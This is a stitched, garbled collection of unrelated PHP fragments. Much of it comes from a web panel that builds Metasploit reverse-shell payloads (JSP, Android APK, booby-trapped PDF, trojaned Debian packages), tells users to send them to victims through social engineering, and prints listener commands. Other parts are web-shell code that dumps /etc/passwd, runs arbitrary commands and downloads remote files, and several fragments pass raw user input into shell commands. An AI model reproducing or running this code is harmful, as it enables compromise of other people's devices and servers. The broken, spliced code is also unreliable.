function ps($fields)
{
$out = shell(sprintf('ps -eo %s 2>&1', escapeshellarg($fields)));
$ret = array();
foreach (array_slice(preg_split('/\\R/', $out), 1, -1) as $line) {
$ret[] = $line;
}
return $ret;
}
function create_tables()
{
if (file_exists(DB)) {
$cmd = 'rm -f ' . DB;
shell($cmd);
}
$db = new SQLite3(DB);
$db->exec("BEGIN DEFERRED;");
query('CREATE TABLE comics (id INTEGER PRIMARY KEY AUTOINCREMENT, title TEXT, pages INTEGER, zip_path TEXT, cover TEXT);', $db);
query('CREATE TABLE images (id INTEGER PRIMARY KEY AUTOINCREMENT, comics_id INTEGER, page INTEGER, filepath TEXT);', $db);
$db->exec("COMMIT;");
return true;
}
function trash_run($args)
{
define('ID_COLUMN', getOption('id-col', $args));
$input = getOption('input-file', $args);
$jobDate = shell('date +"%F %R"');
if ($args['undelete']) {
define('UNDELETE', TRUE);
$apiTag = createJobTag($jobDate, 'UNDelete CiviCRM Contacts');
} else {
define('UNDELETE', FALSE);
$apiTag = createJobTag($jobDate, 'Delete CiviCRM Contacts');
}
define('TAG_ID', $apiTag->id);
$main = 'processContacts';
withFile($input, $main);
}
function ps_query()
{
$out = shell('ps -eo pid,ppid,pgid,comm,args');
$ret = array();
foreach (array_slice(preg_split('/\\R/', $out), 1, -1) as $line) {
preg_match('/(\\d+)\\s+(\\d+)\\s+(\\d+)\\s+(\\S+)\\s+(.*)/', $line, $m);
$ret[] = array('pid' => intval($m[1]), 'ppid' => intval($m[2]), 'pgid' => intval($m[3]), 'comm' => $m[4], 'args' => $m[5]);
}
usort($ret, function ($a, $b) {
$cmp = $a['ppid'] - $b['ppid'];
if ($cmp == 0) {
$cmp = $a['pid'] - $b['pid'];
}
return $cmp;
});
return $ret;
}
#
function shell($arr)
{
$n = count($arr);
$h = 1;
while ($h < $n / 3) {
$h = $h * 3 + 1;
}
while ($h >= 1) {
for ($i = 1; $i < $n; $i++) {
for ($j = $i; $j >= $h; $j = $j - $h) {
if ($arr[$j] < $arr[$j - $h]) {
swap($arr, $j, $j - $h);
} else {
break;
}
}
}
$h = floor($h / 3);
}
return $arr;
}
function swap(&$arr, $i, $j)
{
$tmp = $arr[$i];
$arr[$i] = $arr[$j];
$arr[$j] = $tmp;
}
$arr = [1, 43, 54, 62, 21, 66, 32, 78, 36, 76, 39];
print_r(shell($arr));
exec("sudo zip exploits/{$pkg}.zip exploits/{$pkg}.jsp");
echo '<p><b>Payload Configuration</b></p>';
echo '****************************************************************************';
echo '<p><b>LHOST</b> -->' . $ip . '</p>';
echo '<p><b>LPORT</b> -->' . $port . '</p>';
echo '<p><b>PACKAGE NAME</b> -->' . $pkg . '.jsp</p>';
echo '<p><b>PAYLOAD</b> -->java/jsp_shell_reverse_tcp</p>';
echo '<p><b>AVAILABLE FOR DOWNLOAD @</b> --><a href=exploits/' . $pkg . '.zip>click here</a>';
echo '<p><b>AFFECTED SYSTEMS ARE</b> -->Websites(jsp)</p>';
echo '<p>*****************************************************************************</p>';
echo '<b>Note:</b> Upload this shell on website supporting JSP and start meterpreter listener ';
echo '<p><b>To start listener copy and paste this code in to your terminal:</b></p>';
echo '<code style="float:top;backface-visibility: visible;background-color:#BBB7B7;color:#5A7359"><b>sudo msfcli exploit/multi/handler PAYLOAD=java/jsp_shell_reverse_tcp LHOST=' . $ip . ' LPORT=' . $port . ' E </b></code>';
break;
case c16:
shell("echo '[Wait] While i generate your {$pkg}.apk payload..........'");
exec("sudo msfpayload android/meterpreter/reverse_tcp LHOST={$ip} LPORT={$port} R >exploits/{$pkg}.apk");
exec("sudo chmod +x exploits/{$pkg}.apk");
echo '<p><b>Payload Configuration</b></p>';
echo '****************************************************************************';
echo '<p><b>LHOST</b> -->' . $ip . '</p>';
echo '<p><b>LPORT</b> -->' . $port . '</p>';
echo '<p><b>PACKAGE NAME</b> -->' . $pkg . '.apk</p>';
echo '<p><b>PAYLOAD</b> -->android/meterpreter/reverse_tcp</p>';
echo '<p><b>AVAILABLE FOR DOWNLOAD @</b> --><a href=exploits/' . $pkg . '.apk>Click here</a>';
echo '<p><b>AFFECTED SYSTEMS ARE</b> -->Android OS</p>';
echo '<p>*****************************************************************************</p>';
echo '<b>Note:</b>You can send this package to victim by any social engineering techniques ';
echo '<p><b>To start listener copy and paste this code in to your terminal:</b></p>';
echo '<code style="float:top;backface-visibility: visible;background-color:#BBB7B7;color:#5A7359"><b>sudo msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=' . $ip . ' LPORT=' . $port . ' E </b></code>';
break;
} else {
echo '<p>Emplacement de téléportation introuvable</p>';
}
} else {
echo '<p>Joueur introuvable</p>';
}
} else {
echo "Erreur";
}
break;
case "motd":
echo "\n\t\t\t\t<p class=\"title\">Modifier le MOTD</p>\n\t\t\t\t<p><form method=\"post\" action=\"index.php?module=shell&action=motd_v\">\n\t\t\t\t\tNouveau message du jour : <input type=\"text\" name=\"motd\"><br />\n\t\t\t\t\t<p>Attention : Eviter les accents</p>\n\t\t\t\t\t<center><input type=\"submit\" name=\"ok\" value=\"Envoyer\"></center>\n\t\t\t\t</form></p>";
break;
case "motd_v":
$motd = $_POST['motd'];
$send = shell('server set motd ' . $motd);
if ($send) {
echo "<p>Le message du jour à été redéfini en " . $motd . ".</p>";
} else {
echo "<p>Erreur lors de l'envoie</p>";
}
break;
case "ticket":
echo "\n\t\t\t\t<p class=\"title\">Voir un ticket</p>\n\t\t\t\t<p>Remplir un des deux champs</p>\n\t\t\t\t<p><form method=\"post\" action=\"index.php?module=shell&action=ticket_v\">\n\t\t\t\t\tNom ou ID du personnage : <input type=\"text\" name=\"char\"><br />\n\t\t\t\t\tID du ticket : <input type=\"text\" name=\"ticket\">\n\t\t\t\t\t<center><input type=\"submit\" name=\"ok\" value=\"Voir\"></center>\n\t\t\t\t</form></p>";
break;
case "ticket_v":
if (isset($_POST['ok'])) {
require "../kernel/config.php";
mysql_connect($characters[1]['host'], $characters[1]['user'], $characters[1]['password']) or die(mysql_error());
$char = mysql_real_escape_string($_POST['char']);
$ticket = mysql_real_escape_string($_POST['ticket']);
die("Bad, very bad, this characters are not accepted: ; | & %");
}
$str .= $value;
}
$url = trim($url);
//remove space from start and end of url
if (substr(strtolower($url), 0, 7) == "http://") {
$url = substr($url, 7);
}
// remove http:// if included
if (substr(strtolower($url), 0, 8) == "https://") {
$url = substr($url, 8);
}
$url_parts = explode("/", $url);
$url = $url_parts[0];
shell("sudo nmap {$str} {$url}");
echo '</div>
<footer>
<div align="left">
<h3>Thank You!</h3>
</div>
</footer>
</article><!-- end of styles article -->
<h4 class="alert_success">Scan Succeeded </h4>
';
echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Nmap Done ! See result in result section'});</script>";
}
}
?>
$ip = $_POST['ip'];
$port = $_POST['port'];
$pkg = $_POST['pkg'];
$c = $_POST['c'];
if ($ip == '' || $port == '') {
echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'You Have not entered datas correctly...'});</script>";
} else {
echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Generating Payloads, please wait... ! Please refer result section after this message'});</script>";
require_once 'loading.php';
exec("sudo rm -r exploits/ && sudo mkdir exploits && sudo chmod 777 -R exploits/");
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $pkg)) {
echo "File is valid, and was successfully uploaded.\n" . "<br/>";
shell("echo '[Wait] While I generate your payload......'");
exec("sudo chmod 777 {$pkg}");
exec("sudo msfcli exploit/windows/fileformat/adobe_pdf_embedded_exe LHOST={$ip} LPORT={$port} INFILENAME=/var/www/lab/{$pkg} FILENAME=veer.pdf PAYLOAD={$c} E\n");
shell("sudo mv /root/.msf4/local/veer.pdf exploits/{$pkg}");
exec("sudo rm {$pkg} && sudo chmod 755 exploits/{$pkg}");
exec("sudo zip exploits/{$pkg}.zip exploits/{$pkg} ");
echo '<p><b>Payload Configuration</b></p>';
echo '****************************************************************************';
echo '<p><b>LHOST</b> -->' . $ip . '</p>';
echo '<p><b>LPORT</b> -->' . $port . '</p>';
echo '<p><b>PACKAGE NAME</b> -->' . $pkg . '</p>';
echo '<p><b>PAYLOAD</b> -->' . $c . '</p>';
echo '<p><b>AVAILABLE FOR DOWNLOAD zip format @</b> --><a href=exploits/' . $pkg . '.zip>Click here</a>';
echo '<p><b>AFFECTED SYSTEMS ARE</b> --> Adobe Reader v8.x, v9.x (Windows OS)</p>';
echo '<p>*****************************************************************************</p>';
echo '<b>Note:</b>You can send this package to victim by any social engineering techniques ';
echo '<p><b>To start listener copy and paste this code in to your terminal:</b></p>';
echo '<code style="float:top;backface-visibility: visible;background-color:#BBB7B7;color:#5A7359"><b>sudo msfcli exploit/multi/handler PAYLOAD=' . $c . ' LHOST=' . $ip . ' LPORT=' . $port . ' E <b></code>';
} else {
<?php
require __DIR__ . '/../share/app.php';
$f = isset($_GET['f']) ? strval($_GET['f']) : __DIR__;
if (isset($_GET['q']) && trim($_GET['q']) != '') {
$out = shell(sprintf('locate %s', escapeshellarg(trim($_GET['q']))));
$fields = array(new TableFieldIcon(), new TableFieldLink('Name', 'path', function (FileModel $file) {
return url(array('q' => false, 'f' => $file->path()));
}), new TableField('Type', 'type'), new TableFieldFormat('Size', 'size', 'format_bytes'), new TableField('MIME', 'mime'), new TableField('Permissions', 'perms'));
$rows = array();
foreach (explode("\n", $out) as $row) {
if (!empty($row)) {
$rows[] = new TableRow(new FileModel($row), $fields);
}
}
$middle = render_str('foobar/table', compact('fields', 'rows'));
} else {
$file = new FileModel($f);
if (is_dir($f)) {
$fields = array(new TableFieldIcon(), new TableFieldLink('Name', 'basename', function (FileModel $file) {
return url(array('q' => false, 'f' => $file->path()));
}), new TableField('Type', 'type'), new TableFieldFormat('Size', 'size', 'format_bytes'), new TableField('MIME', 'mime'), new TableField('Owner', 'owner'), new TableField('Group', 'group'), new TableField('Permissions', 'perms'));
$rows = $file->rows();
$middle = render_str('foobar/table', array('fields' => $fields, 'rows' => new TableRowGenerator($rows, $fields)));
} else {
switch ($file->mime()) {
case 'audio/mpeg':
if (begins($file->realpath(), $_SERVER['DOCUMENT_ROOT'])) {
$middle = render_str('foobar/audio', array('src' => replace_prefix($file->realpath(), $_SERVER['DOCUMENT_ROOT'], '/')));
} else {
$middle = render_str('foobar/audio', array('src' => 'image.php?' . http_build_query(array('f' => $file->realpath()))));
shell(" sslyze {$url}:{$port0} |sed -e '1,11d'");
}
if (isset($c5)) {
echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'Checking if {$url} uses load balancing..See details in Result section'});</script>";
echo "<p><b>Checking if {$url} uses load balancing</b></p>";
shell("lbd {$url}|sed -e '1,3d'");
}
if (isset($c6)) {
echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'Detecting firewall for {$url}..See details in Result section'});</script>";
echo "<p><b>Detecting firewall for {$url} :</b></p>";
shell("wafw00f {$url} |sed -e '1,13d'");
}
if (isset($c7)) {
echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'Detecting Application @ {$port} on {$url}..See details in Result section'});</script>";
echo "<p><b>Detecting Application at port {$port} on {$url} :</b></p>";
shell("sudo amap -A {$url} {$port}|grep 'Protocol\\|Unidentified'");
}
echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'Scanning Done for {$url}..See details in Result section'});</script>";
echo '</div>
<footer>
<div align="left">
<h3>Thank You!</h3>
</div>
</footer>
</article><!-- end of styles article -->
<h4 class="alert_success">Scan Succeeded </h4>
';
} else {
echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : '!!!!You have not selected any option!!!!'});</script>";
$time = microtime(true);
$f($x);
return microtime(true) - $time;
});
defun('tabulate', function ($h1, $h2, $arr) {
return key_foldr(function ($str, $row) {
list($n, $v) = $row;
$v = is_array($v) ? implode(' ', $v) : $v;
$s = format($v);
return "{$str}\n{$n} {$s}";
}, "{$h1} " . (is_array($h2) ? implode(' ', $h2) : $h2), $arr);
});
defun('shell', 'shell_exec');
defun('mem', function ($cmd) {
$time = trim(substr(`whereis time`, 6));
return intval(shell("{$time} -f '%M' {$cmd} 2>&1 1> /dev/null"));
});
defun('runphp', function ($f, $arg) {
return "./runphp '{$f}({$arg})'";
});
function papply()
{
$args = func_get_args();
$f = op(array_shift($args));
return function () use($args, $f) {
static $curried = true;
return call_user_func_array('call_user_func', array_merge($args, func_get_args()));
};
}
defun('parens', function ($x) {
return "({$x})";
var yPos = row;
$(root).find('.cell[pos=p-' + xPos1 + '-' + yPos + ']').removeClass('on').addClass(cssClass);
$(root).find('.cell[pos=p-' + xPos2 + '-' + yPos + ']').removeClass('on').addClass(cssClass);
}
}
}
$(document).ready(function() {
function spawn() {
$('.invader').each(function() { render(this, dna()); });
}
spawn();
setInterval(spawn, 1000);
});
</script>
<?php
for ($i = 0; $i < 300; $i++) {
?>
<?php
echo shell();
?>
<?php
}
?>
</body>
</html>
function ts_info($job_id)
{
return shell(sprintf('tsp -i %s 2>&1', escapeshellarg($job_id)));
}
if ($ip == '' || $port == '') {
echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'You Have not entered datas correctly...'});</script>";
} else {
echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Generating Payloads, please wait... ! Please refer result section after this message'});</script>";
require_once 'loading.php';
echo "<fieldset>";
switch ($p) {
case p1:
$sh = "freesweep.sh";
$pkg = "freesweep.deb";
shell("sudo sh cmd/debian/{$sh} {$c} {$ip} {$port} {$uname}");
break;
case p2:
$sh = "xbomb.sh";
$pkg = "xbomb.deb";
shell("sudo sh cmd/debian/{$sh} {$c} {$ip} {$port} {$uname}");
break;
}
echo '<p><b>Payload Configuration</b></p>';
echo '****************************************************************************';
echo '<p><b>LHOST</b> -->' . $ip . '</p>';
echo '<p><b>LPORT</b> -->' . $port . '</p>';
echo '<p><b>PACKAGE NAME</b> -->' . $pkg . '</p>';
echo '<p><b>PAYLOAD</b> -->' . $c . '</p>';
echo '<p><b>AVAILABLE FOR DOWNLOAD @</b> --><a href=exploits/' . $pkg . '>Click here</a>';
echo '<p><b>AFFECTED SYSTEMS ARE</b> -->Debian Based Linux Distributions</p>';
echo '<p>*****************************************************************************</p>';
echo '<b>Note:</b>You can send this package to victim by any social engineering techniques ';
echo '<p><b>To start listener copy and paste this code in to your terminal:</b></p>';
echo '<code style="float:top;backface-visibility: visible;background-color:#BBB7B7;color:#5A7359"><b> sudo msfcli exploit/multi/handler PAYLOAD=' . $c . ' LHOST=' . $ip . ' LPORT=' . $port . ' E </b></code>';
$host = $_SERVER['SERVER_ADDR'];
function mostrararchivo($ruta, $loc = true)
{
static $leidos;
//Si hay alguna funcion especial que bypassee el open_basedir tiene que ir acá
$ruta = realpath($ruta);
if (filesize($ruta) < 50000) {
if (strpos($leidos, "\n" . $ruta . "\n") == false) {
$leidos .= "\n" . $ruta . "\n";
$contenido = htmlentities(leerarchivo(ltrim($ruta)), ENT_QUOTES, 'UTF-8');
if ($contenido) {
$lineas = substr_count($contenido, "\n");
if ($lineas > 15) {
$lineas = 15;
}
echo '<div class="s">' . htmlentities($ruta, ENT_QUOTES, 'UTF-8') . ':</div><textarea style="width:100%;" rows="' . $lineas . '">' . $contenido . '</textarea><br><br>';
} elseif ($loc and $loc != "''") {
//usamos locate para encontrar mas archivos con ese nombre
echo $ruta . "<br>";
$locate = shell("locate " . escapeshellarg(basename($ruta)), false);
$locate = explode("\n", $locate);
if ($locate) {
foreach ($locate as $ubicacion) {
mostrararchivo($ubicacion, false);
}
}
}
}
} else {
echo '<div class="n" style="text-decoration: underline;">No se puede leer ' . htmlentities($ruta, ENT_QUOTES, 'UTF-8') . ' porque supera los 50000 bytes</div><br>';
}
}
<?php
if (isset($_POST['submit'])) {
$url = $_POST['url'];
$c = $_POST['c'];
$check = $_POST['check'];
if ($url == '') {
echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'You Have not entered any URL.Please enter an URL to continue..'});</script>";
} else {
echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'BlindElephant scan for {$url} ! Please refer result section after this message'});</script>";
require_once 'loading.php';
if (isset($check)) {
echo "<p><b>Guessing the name of CMS</b></p>";
shell(" BlindElephant.py {$url} guess");
} else {
shell("BlindElephant.py {$url} {$c}");
}
echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'BlindElephant Scan ! See Full result in result section'});</script>";
echo '</div>
<footer>
<div align="left">
<h3>Thank You!</h3>
</div>
</footer>
</article><!-- end of styles article -->
<h4 class="alert_success">Scan Succeeded </h4>
';
}
}
}
}
for ($i = 0, $max = count($FILES); $i < $max; $i++) {
$FILE = $FILES[$i];
if (isset($time)) {
if ($filter === 2) {
if (filemtime("scans/thumb/{$FILE}") < $time) {
continue;
}
} else {
if ($filter === 1) {
if (filemtime("scans/thumb/{$FILE}") > $time) {
continue;
}
} else {
if ($filter === 3) {
if (!(filemtime("scans/thumb/{$FILE}") > $time[1] && filemtime("scans/thumb/{$FILE}") < $time[0])) {
continue;
}
}
}
}
}
$FILE = substr($FILE, 7, -3);
$FILE = substr(exe("cd 'scans/file'; ls " . shell("Scan{$FILE}") . '*', true), 5, -1);
//Should only have one file listed
$IMAGE = $FILES[$i];
echo '<div class="box" id="' . html($FILE) . '">' . '<h2 ondblclick="toggleFile(this);" class="excluded">' . html($FILE) . '</h2><p><span>' . genIconLinks(null, "Scan_{$FILE}", false) . '</span><br/>' . '<a class="tool" target="_blank" href="scans/file/Scan_' . url($FILE) . '" style="width:100%;"><img src="scans/thumb/' . url($IMAGE) . '" alt="' . html($FILE) . '" style="width:100%"/><span class="tip">View raw file</span></a>' . '</p></div>';
}
echo '</div><script type="text/javascript">' . 'if(typeof document.body.style.MozColumnGap=="string")' . 'getID("scans").className="columns";' . 'else ' . 'enableColumns("scans",null,' . (isset($_COOKIE["columns"]) ? 'true' : 'false') . ');</script>';
}
$url = substr($url, 7);
}
// remove http:// if included
if (substr(strtolower($url), 0, 8) == "https://") {
$url = substr($url, 8);
}
// remove http:// if included
if (substr(strtolower($url), 0, 4) == "www.") {
$url = substr($url, 4);
}
//remove www from domain
$url_parts = explode("/", $url);
$url = $url_parts[0];
echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : ' investigating IP Addresses and URLs with the common web based tools'});</script>";
shell("echo 'Investigating IP Addresses and URLs with common web based tools' ");
shell("sudo automater -t {$url}|sed -e'1,13d'");
}
echo '</div>
<footer>
<div align="left">
<h3>Thank You!</h3>
</div>
</footer>
</article><!-- end of styles article -->
<h4 class="alert_success">Scan Succeeded </h4>
';
} else {
echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : '!!!!You have not selected any option!!!!'});</script>";
die("!!!!You Have Not Selected any option!!!!");
echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'You Have not entered any URL.Please enter an URL to continue..'});</script>";
} else {
if (isset($c0)) {
require_once 'loading.php';
switch ($c0) {
case c1:
echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content :'starting ping-sweep using nmap'});</script>";
echo "<p><b>Discovering which hosts are up within a range of IP addresses {$url}:</b></p>";
shell("echo 'Wait.........'");
shell(" sudo nmap -sP -T Insane {$url}|sed -e '1,2d'");
break;
case c2:
echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content :'Scanning Network {$url} for NetBIOS Name.Refer Result Section for details'});</script>";
echo "<p><b>Scanning Network {$url} for NetBIOS Name</b></p>";
shell("cho 'Wait........'");
shell("sudo nbtscan -r {$url}");
break;
}
echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content :'Scanning Done '});</script>";
echo '</div>
<footer>
<div align="left">
<h3>Thank You!</h3>
</div>
</footer>
</article><!-- end of styles article -->
<h4 class="alert_success">Scan Succeeded </h4>
';
}
function shell_pstree($pid)
{
return shell(sprintf('pstree -a %s 2>&1', escapeshellarg($pid)));
}
/**
* Use civicrm/bin/cli.php to call the API
* NOTE: requires core hack to add --json output option.
* https://gist.github.com/ginkgomzd/b26a750b2fbd3ce25950
*
* @param type $entity
* @param type $action
* @param type $params
* @return type
*/
function cvCli($entity, $action, $params = array())
{
if (function_exists("civicrm_api3")) {
try {
return civicrm_api3($entity, $action, $params);
} catch (CiviCRM_API3_Exception $e) {
echo $e->getMessage();
return null;
}
}
$cmdApi = CIVICRM_ROOT . '/bin/cli.php';
$clParams = '';
foreach ($params as $key => $value) {
$clParams .= " --{$key}=\"{$value}\"";
}
$call = "php {$cmdApi} -e {$entity} -a {$action} {$clParams} --json";
echo $call . "\n";
$apiResult = json_decode(shell($call));
return $apiResult;
}
shell("sudo python ./harvester/theHarvester.py -d {$url} -l {$limit} -v -t -b {$c}");
} elseif (isset($c2) && isset($c3)) {
shell("");
shell("python ./harvester/theHarvester.py -d {$url} -l {$limit} -n -t -b {$c}");
} elseif (isset($c1)) {
shell("");
shell("python ./harvester/theHarvester.py -d {$url} -l {$limit} -v -b {$c}");
} elseif (isset($c2)) {
shell("");
shell("python ./harvester/theHarvester.py -d {$url} -l {$limit} -n -b {$c}");
} elseif (isset($c3)) {
shell("");
shell("python ./harvester/theHarvester.py -d {$url} -l {$limit} -t -b {$c}");
} else {
shell("");
shell("python ./harvester/theHarvester.py -d {$url} -l {$limit} -b {$c}");
}
}
echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Info Harvesting Completed!You Can see Full result in result section'});</script>";
echo '</div>
<footer>
<div align="left">
<h3>Thank You!</h3>
</div>
</footer>
</article><!-- end of styles article -->
<h4 class="alert_success">Scan Succeeded </h4>
';
}
if ($url == '') {
echo "<script type='text/javascript'>\$.msg({fadeIn : 500,fadeOut : 500,bgPath : 'dlgs/', content : 'You Have not entered any URL.Please enter an URL to continue..'});</script>";
} else {
if (isset($c)) {
require_once 'loading.php';
switch ($c) {
case c1:
echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Getting HTTP Header!Please refer result section after this message'});</script>";
echo "<p><b>Getting HTTP Header on {$url}</b></p>";
shell("sudo curl -I {$url}");
echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'See HTTP Header details for {$url} in Result Section'});</script>";
break;
case c2:
echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Dumping all the links of {$url} in your web page!Please refer result section after this message'});</script>";
echo "<p><b>Dumping all the links of {$url} in your web page</b></p>";
shell(" lynx -dump {$url} ");
echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Links dumped from {$url} to your result section'});</script>";
break;
case c3:
echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Checking link status on {$url} !Refer Result Section For Detail'});</script>";
require 'microLink.php';
echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Done!Please refer result section after this message'});</script>";
break;
}
}
echo '</div>
<footer>
<div align="left">
<h3>Thank You!</h3>
</div>
shell("dig +nocmd {$url} any +multiline +noall +answer");
break;
case c7:
echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Execution Started!Please refer result section after this message'});</script>";
echo "<p><b>Bruteforcing DNS-Records for Domain {$url} </b></p>";
shell("sudo nmap -Pn -p 80 --script dns-brute {$url}|sed -e '1,4d'");
break;
case c8:
echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Viewing DNS Records for {$url}!Please refer result section after this message'});</script>";
echo "<p><b>Viewing DNS Records for {$url} </b></p>";
shell("host -t any {$url}");
break;
case c9:
echo "<script type='text/javascript'>\$.msg({ fadeIn : 500,fadeOut : 500, bgPath : 'dlgs/', content : 'Tracing a chain of DNS Server to the source!Please refer result section after this message'});</script>";
echo "<p><b>Tracing a chain of DNS Server to the source </b></p>";
shell("dnstracer {$url}");
break;
}
}
echo '</div>
<footer>
<div align="left">
<h3>Thank You!</h3>
</div>
</footer>
</article><!-- end of styles article -->
<h4 class="alert_success">Scan Succeeded </h4>
';
}
$_shell_session->start();
header("Content-Type: text/html; charset=utf-8");
extract($_shell_session->getLocals(), EXTR_SKIP);
// Disable all error reporting, otherwise it mess with the output.
error_reporting(0);
// Errors are handled with an error handler and a fatal error handler, because
// exceptions are not catchable when evaluating code.
register_shutdown_function('shutdown_handler');
set_error_handler('error_handler');
ob_start(['Session', 'scrubOutput']);
eval($_shell_session->prependUseStatements($_shell_statement));
ob_end_flush();
$_shell_session->end($_shell_statement, get_defined_vars());
}
session_start();
if (!isset($_SESSION["session"])) {
$_SESSION["session"] = new Session();
}
if (isset($_SESSION['token']) && $_GET['token'] === $_SESSION['token']) {
// Append a semi-colon just in case the statement doen't have one. An extra
// semi-colon makes no harm.
shell($_GET["statement"] . ";", $_SESSION["session"]);
} else {
if (!isset($_SESSION['token'])) {
syslog(LOG_ERR, 'Missing session token');
echo "Session token missing - Please reset your session.";
} else {
syslog(LOG_ERR, 'Mismatch session token.');
echo "Invalid session token - Please reset your session.";
}
}
function mostrarinformacion()
{
$ruta = getcwd() or '/';
if (!ini_get('safe_mode') or strtolower(ini_get('safe_mode')) == 'off') {
$safemode = 'No';
} else {
$safemode = 'Si';
}
$salida = '<b>' . htmlentities(__FILE__, ENT_QUOTES, 'UTF-8') . '</b><br><br>
<b>' . htmlentities(decodeSize(disk_free_space($ruta)), ENT_QUOTES, 'UTF-8') . '</b> / <b>' . htmlentities(decodeSize(disk_total_space($ruta)), ENT_QUOTES, 'UTF-8') . '</b><br><br>
<b>PHP:</b> ' . htmlentities(phpversion(), ENT_QUOTES, 'UTF-8') . '<br><br>
<b>Zend:</b> ' . htmlentities(zend_version(), ENT_QUOTES, 'UTF-8') . '<br><br>
<b>Safe_mode:</b> ' . $safemode . '<br><br>
<b>Funciones desactivadas:</b> ' . htmlentities(ini_get('disable_functions'), ENT_QUOTES, 'UTF-8') . '<br><br>
<b>Open basedir:</b> ' . htmlentities(ini_get('open_basedir'), ENT_QUOTES, 'UTF-8') . '<br><br>
<b>' . htmlentities(php_uname(), ENT_QUOTES, 'UTF-8') . '</b><br><br>';
if ($id = shell('id', false)) {
$salida .= '<b>' . htmlentities($id, ENT_QUOTES, 'UTF-8') . '</b><br><br>
' . htmlentities(shell('whereis gcc', false), ENT_QUOTES, 'UTF-8') . '<br><br>
' . htmlentities(shell('whereis perl', false), ENT_QUOTES, 'UTF-8') . '<br><br>
' . htmlentities(shell('whereis python', false), ENT_QUOTES, 'UTF-8') . '<br><br>
' . htmlentities(shell('whereis curl', false), ENT_QUOTES, 'UTF-8') . '<br><br>
' . htmlentities(shell('whereis wget', false), ENT_QUOTES, 'UTF-8') . '<br><br>
<br>
';
}
if ($usuarios = leerarchivo('/etc/passwd')) {
$salida .= '<b>/etc/passwd:</b><br>
<textarea style="width:100%;" rows="10">' . $usuarios . '</textarea><br><br>';
}
return $salida;
}
shell(which('wget') . " " . $_POST['urldown'] . " -O " . $_POST['filename'] . "");
break;
case fetch:
shell(which('fetch') . " -o " . $_POST['filename'] . " -p " . $_POST['urldown'] . "");
break;
case lynx:
shell(which('lynx') . " -source " . $_POST['urldown'] . " > " . $_POST['filename'] . "");
break;
case links:
shell(which('links') . " -source " . $_POST['urldown'] . " > " . $_POST['filename'] . "");
break;
case GET:
shell(which('GET') . " " . $_POST['urldown'] . " > " . $_POST['filename'] . "");
break;
case curl:
shell(which('curl') . " " . $_POST['urldown'] . " -o " . $_POST['filename'] . "");
break;
}
}
}
}
//Brute
if ($action == 'brute') {
function Brute()
{
global $action, $pass_de, $chars_de, $dat, $date;
ignore_user_abort(1);
}
if ($chars_de == "") {
$chars_de = "";
}
</td>
<td width="25%" >Server time: <?php
echo date('H:i d-m-Y');
?>
</td>
</tr>
</table>
</td></tr></table>
<table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;>
<tr><th class=t align=left><b>Shell</b></th></tr>
<tr><td class=contentb><center>
<form action method=POST>
<input type=hidden name="type" value=5>
<textarea cols=150 rows=20 name="value">
<?php
echo htmlspecialchars(shell());
?>
</textarea><?php
echo edit();
?>
</form>
<table border="0" width="100%">
<tr>
<td width="50%" align="center"><form action method=POST>
<b>Enter comand:</b>
<input type=hidden name="type" value=2>
<input type=text name="value" size=45><input type=submit value="Enter">
</form></td>
<td width="50%" align="center"><form action method=POST><b>PWD:</b> <input type=text name="value" size=51 value=<?php
echo pwd();
?>
<?php
require __DIR__ . '/../../share/app.php';
try {
$pid = intval($_GET['pid']);
$out = shell(sprintf('ps -p %s', escapeshellarg($pid)));
echo '<pre>', $out, '</pre>';
$out = shell(sprintf('pstree -cl -p %s', escapeshellarg($pid)));
